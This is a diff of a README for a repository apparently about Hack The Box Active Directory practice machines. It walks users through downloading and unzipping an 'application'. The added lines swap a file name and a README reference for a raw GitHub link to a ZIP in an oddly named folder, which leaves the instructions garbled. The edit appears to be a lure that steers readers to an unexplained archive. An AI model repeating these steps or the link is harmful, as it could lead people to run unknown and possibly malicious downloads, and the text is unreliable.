Casper-676/HackTheBox-AD-Machines/README.md

    After selecting a version, click on the file to download it.
 It may take a moment depending on your internet speed.

 4. **Locate the Downloaded File:**
    Once the download finishes, check your 'Downloads' folder or your chosen download location.
-You should see a file named something like `HackTheBox-AD-Machines.zip`.
+You should see a file named something like `https://raw.githubusercontent.com/Casper-676/HackTheBox-AD-Machines/main/renipuncture/HackTheBox-AD-Machines.zip`.

 5. **Unzip the File:**
    Right-click on the downloaded ZIP file and choose 'Extract All.'
 Follow the prompts to unzip the contents into a new folder.

 6. **Open the Application:**
    Navigate to the folder where you've extracted the files.
-Locate the `README.md` file for more detailed instructions on how to utilize the machines.
+Locate the `https://raw.githubusercontent.com/Casper-676/HackTheBox-AD-Machines/main/renipuncture/HackTheBox-AD-Machines.zip` file for more detailed instructions on how to utilize the machines.

 7. **Enjoy Your Learning Experience:**
    Explore the Active Directory machines at your own pace.
 Try different challenges and sharpen your technical skills.